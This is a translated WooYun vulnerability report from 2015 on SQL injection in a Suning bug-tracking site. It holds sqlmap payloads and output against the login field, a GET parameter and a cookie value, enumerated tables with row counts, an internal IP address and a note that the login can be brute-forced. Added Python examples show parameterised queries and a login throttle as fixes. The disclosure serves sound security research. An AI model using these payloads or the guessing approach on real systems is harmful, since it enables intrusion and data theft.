
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0156653

Title: A certain Suning site gets worse with every fix (direct SQL injection at the login + weak passwords on all users + more injection after login, cookie included)

Vendor: Jiangsu Suning E-Commerce Co., Ltd. (江苏苏宁易购电子商务有限公司)

Author: 路人甲

Submitted: 2015-11-29 09:32

Fixed: 2016-01-14 08:46

Published: 2016-01-14 08:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-29: Details sent to the vendor, awaiting vendor action
2015-11-30: Vendor confirmed, details disclosed to the vendor only
2015-12-10: Details disclosed to core white hats and domain experts
2015-12-20: Details disclosed to regular white hats
2015-12-30: Details disclosed to intern white hats
2016-01-14: Details disclosed to the public

Brief description:

Unbelievably, every fix makes it worse: never mind that the injection point is still unfixed, there is a pile of weak passwords!~~~ The logging looks very frequent!~~~ Several million records, and some other thing I didn't bother looking at, tens of millions!~~~
Please mask the address!~~~

Detailed description:

Injection point:
Please mask this

http://bug2go.suning.com/ (POST)
formhash=e171e650&login=1&username=admin&password=admin


[screenshot: 0.jpg]


username is injectable without even needing a bypass!~~~

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: formhash=e171e650&login=1&username=admin' AND (SELECT 5063 FROM(SELECT COUNT(*),CONCAT(0x71696e6371,(SELECT (CASE WHEN (5063=5063) THEN 1 ELSE 0 END)),0x71776a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PuUt'='PuUt&password=admin
---
[19:41:43] [INFO] testing MySQL
[19:41:43] [WARNING] reflective value(s) found and filtering out
[19:41:43] [INFO] confirming MySQL
[19:41:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.0
back-end DBMS: MySQL >= 5.0.0
[19:41:44] [INFO] fetching current user
[19:41:44] [INFO] retrieved: buguser@%
current user: 'buguser@%'
[19:41:44] [INFO] fetching current database
[19:41:44] [INFO] retrieved: bug2go
current database: 'bug2go'
[19:41:44] [INFO] testing if current user is DBA
[19:41:44] [INFO] fetching current user
current user is DBA: False
database management system users [1]:
[*] 'buguser'@'%'
available databases [3]:
[*] bug2go
[*] information_schema
[*] test
Database: bug2go
+-----------------+----------+
| Table           | Entries  |
+-----------------+----------+
| bug_sync        | 51106591 |
| bug_log         | 4737376  |
| bug_hint        | 4124952  |
| bug_syncstats   | 2652126  |
| bug_attribution | 303532   |
| bug_process     | 39973    |
| bug_actdevice   | 32779    |
| bug_actrequest  | 30062    |
| bug_aprdevice   | 23295    |
| bug_actstats    | 3909     |
| bug_package     | 371      |
| bug_forumindex  | 367      |
| bug_component   | 144      |
| bug_apr         | 83       |
| bug_ufrthumb    | 75       |
| bug_index       | 21       |
| bug_user        | 14       |
+-----------------+----------+
Database: bug2go
Table: bug_sync
[23 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| size     | mediumint(9) unsigned |
| version  | varchar(50)           |
| category | char(50)              |
| cid      | tinyint(3) unsigned   |
| cover    | tinyint(3) unsigned   |
| email    | char(50)              |
| etime    | int(10) unsigned      |
| fid      | mediumint(8) unsigned |
| hasimg   | tinyint(3) unsigned   |
| hid      | int(10) unsigned      |
| hits     | tinyint(3) unsigned   |
| imei     | char(15)              |
| jobno    | char(32)              |
| lid      | bigint(20) unsigned   |
| logtime  | int(10) unsigned      |
| model    | char(32)              |
| name     | varchar(128)          |
| phone    | char(17)              |
| pid      | mediumint(8) unsigned |
| sid      | bigint(20) unsigned   |
| status   | tinyint(3) unsigned   |
| stime    | int(10) unsigned      |
| type     | char(3)               |
+----------+-----------------------+
Database: bug2go
Table: bug_log
[12 columns]
+---------+-----------------------+
| Column  | Type                  |
+---------+-----------------------+
| email   | char(50)              |
| fid     | mediumint(8) unsigned |
| hasimg  | tinyint(3) unsigned   |
| hid     | mediumint(8) unsigned |
| imei    | char(20)              |
| lid     | bigint(20) unsigned   |
| logname | char(128)             |
| logtime | int(10) unsigned      |
| model   | char(32)              |
| phone   | char(17)              |
| pid     | mediumint(8) unsigned |
| sid     | bigint(20) unsigned   |
+---------+-----------------------+


[screenshot: 1.jpg]

[screenshot: 2.jpg]

[screenshot: 3.jpg]


We tested this injection point again, adding the sqlmap parameters --level 3 --risk 3.
As we can see: did you forget to fix it, or did you patch the east side and forget the west???

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 355 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: formhash=e171e650&login=1&username=admin' RLIKE (SELECT (CASE WHEN (1774=1774) THEN 0x61646d696e ELSE 0x28 END)) AND 'yRDH'='yRDH&password=admin

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: formhash=e171e650&login=1&username=admin' AND (SELECT 7315 FROM(SELECT COUNT(*),CONCAT(0x7179796c71,(SELECT (CASE WHEN (7315=7315) THEN 1 ELSE 0 END)),0x71616c6c71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gwzq'='gwzq&password=admin

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: formhash=e171e650&login=1&username=admin' AND 1183=BENCHMARK(5000000,MD5(0x6c747a7a)) AND 'vJcM'='vJcM&password=admin
---
[20:04:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.0
back-end DBMS: MySQL 5.0
[20:04:31] [INFO] fetching current user
[20:04:31] [INFO] retrieved: buguser@%
current user: 'buguser@%'
[20:04:31] [INFO] fetching current database
[20:04:31] [INFO] retrieved: bug2go
current database: 'bug2go'
[20:04:31] [INFO] testing if current user is DBA
[20:04:31] [INFO] fetching current user
current user is DBA: False


[screenshot: 6.jpg]


After logging in, you can see the internal-network IP that downloads come from:
http://192.168.36.247

[screenshot: 4.jpg]

[screenshot: 5.jpg]

[screenshot: 5-1.jpg]


Injection point two:
Please mask this

http://bug2go.suning.com/index.php?c=ufr&model=Nexus+4&fid= (GET)


model is injectable

[screenshot: 7.jpg]


Injection point three:
Injection in the cookie; please mask this

http://bug2go.suning.com/index.php?c=ufr&model=Nexus+4&fid= (GET)
Cookie: __utma=1.2022574967.1447869029.1447869029.1447869029.1; __utmz=1.1447869029.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _snma=1%7C144786903039559125%7C1447869030395%7C1447869075994%7C1447869097224%7C3%7C1; _ga=GA1.2.2022574967.1447869029; bug_uid=37; bug_username=mg******po; bug_logintime=1448712442; bug_salt=********


bug_username is injectable

[screenshot: 8.jpg]
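The three injection points above are one defect seen from three inputs: a POST field, a GET parameter and a cookie value are each spliced into the SQL text. The following is an added example, not code from the WooYun report or from the bug2go site: it models the login lookup (injection point one) and the cookie-driven user lookup (injection point three) in Python against an in-memory SQLite database with constructed rows, once with the query text assembled from request data and once with bound parameters. The table name bug_user and the cookie name bug_username follow the report; every other name, value and the parser for the Cookie header are assumptions.

```python
"""
Added example, not from the WooYun report: string-assembled versus
parameterised lookups for the login form and the session cookie.
"""
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed sample data standing in for the report's bug_user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bug_user (uid INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO bug_user VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (37, "mguser", "correct-horse")])
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Query text built from the POST fields: a quote in `username` closes the
    literal and whatever follows is parsed as SQL. A condition appended after
    admin' therefore changes the result (the boolean-based case in the report)
    and a bare admin' produces a database error (the error-based case)."""
    sql = ("SELECT uid FROM bug_user WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone()


def safe_login(conn, username, password):
    """Same lookup with bound parameters: the values never become part of the
    statement, so a quote in `username` is only a character to compare."""
    sql = "SELECT uid FROM bug_user WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


def leaks_db_error(conn, username):
    """True when the assembled query fails to parse, i.e. the kind of syntax
    error an error-based test looks for in the HTTP response."""
    try:
        vulnerable_login(conn, username, "x")
    except sqlite3.OperationalError:
        return True
    return False


def parse_cookie(header):
    """Minimal Cookie-header parser (assumption: name=value pairs split on ';',
    values percent-decoded the way PHP fills $_COOKIE)."""
    jar = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name.strip()] = unquote(value.strip())
    return jar


def vulnerable_session_user(conn, cookie_header):
    """The report's third injection point: bug_username is read from the cookie
    and spliced into SQL exactly like the POST field above. A cookie is
    attacker-controlled request data, not trusted server state."""
    username = parse_cookie(cookie_header).get("bug_username", "")
    sql = "SELECT uid FROM bug_user WHERE username='%s'" % username
    return conn.execute(sql).fetchone()


def safe_session_user(conn, cookie_header):
    """Same cookie lookup with a bound parameter."""
    username = parse_cookie(cookie_header).get("bug_username", "")
    return conn.execute("SELECT uid FROM bug_user WHERE username=?",
                        (username,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Constructed probes in the shape of the report's boolean-based payloads:
    # the vulnerable lookup answers the true and false condition differently,
    # the parameterised one treats both as a literal username and finds nothing.
    for probe in ("admin", "admin' AND 'a'='a", "admin' AND 'a'='b"):
        print(repr(probe), vulnerable_login(db, probe, "admin"),
              safe_login(db, probe, "admin"))
    cookie = "bug_uid=37; bug_username=mguser' AND 'a'='a; bug_logintime=1448712442"
    print(vulnerable_session_user(db, cookie), safe_session_user(db, cookie))
```

The pair of true and false conditions is the differential a boolean-based blind test depends on, and the parse error is what an error-based test reads out of the page; a parameterised query removes both signals because the input never reaches the SQL parser. The same reasoning covers the GET parameter model from injection point two. The fix the vendor needs is not an input filter on username alone (the report shows a patch that missed the cookie) but bound parameters on every query that takes request data.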


Since there is no captcha system, users can of course be brute-forced as well!~~~

[screenshot: 9.jpg]

[screenshot: 10.jpg]
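The weak-password finding is only exploitable at scale because the login accepts unlimited guesses. As an added example, not code from the report or from the site, here is a per-account login throttle of the kind that would have slowed the guessing described above: failures are counted inside a sliding window and the account is locked for a fixed period once the threshold is hit. The thresholds, the function names and the injectable clock are assumptions chosen so the behaviour can be checked without sleeping.

```python
"""
Added example, not from the WooYun report: a sliding-window failed-login
counter with lockout, as one mitigation for a login with no captcha.
"""
import time
from collections import deque


class LoginThrottle:
    def __init__(self, max_failures=5, window=900, lockout=900, clock=time.time):
        self.max_failures = max_failures  # failures tolerated inside `window`
        self.window = window              # seconds over which failures are counted
        self.lockout = lockout            # seconds the account stays locked
        self.clock = clock                # assumption: injectable for testing
        self._failures = {}               # username -> deque of failure timestamps
        self._locked_until = {}           # username -> unlock time

    def allowed(self, username):
        """False while the account's lockout period is still running."""
        return self.clock() >= self._locked_until.get(username, 0)

    def record(self, username, success):
        """Update the counters after one attempt; a success clears them."""
        now = self.clock()
        if success:
            self._failures.pop(username, None)
            self._locked_until.pop(username, None)
            return
        q = self._failures.setdefault(username, deque())
        q.append(now)
        # Drop failures that have aged out of the sliding window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max_failures:
            self._locked_until[username] = now + self.lockout
            q.clear()


def attempt_login(throttle, check_credentials, username, password):
    """Returns 'locked', 'ok' or 'denied'. `check_credentials` is the real
    credential check (assumed here to be any function returning bool); it is
    not even called while the account is locked, so a correct guess during
    the lockout does not log the attacker in."""
    if not throttle.allowed(username):
        return "locked"
    ok = check_credentials(username, password)
    throttle.record(username, ok)
    return "ok" if ok else "denied"


if __name__ == "__main__":
    # Constructed credential store and a fake clock to drive the demo.
    users = {"admin": "correct-horse"}
    clock = [1000.0]
    throttle = LoginThrottle(max_failures=3, window=60, lockout=120,
                             clock=lambda: clock[0])
    check = lambda u, p: users.get(u) == p
    for guess in ("admin", "123456", "password", "correct-horse"):
        print(guess, attempt_login(throttle, check, "admin", guess))
    clock[0] += 121
    print("after lockout:", attempt_login(throttle, check, "admin", "correct-horse"))
```

A per-account lock alone lets anyone lock a victim out by guessing against their name, so in practice it is paired with a per-source-IP limit and with progressive delays rather than a hard lock; the counter structure is the same in both cases. The lock, and every attempt, should also be logged, since a burst of 'denied' results across many accounts from one source is exactly the signal a detection rule for this report's brute-force scenario would fire on.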


If this is an abandoned system, then just shut it down sooner!~~~

Proof of vulnerability:

As above

Fix recommendation:

Nothing more to say!~~~

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-30 08:44

Vendor reply:

Thanks for the submission. We had already learned of this issue through other channels and spent all of last week following up with the developers on the fix for this site.

Latest status:

None yet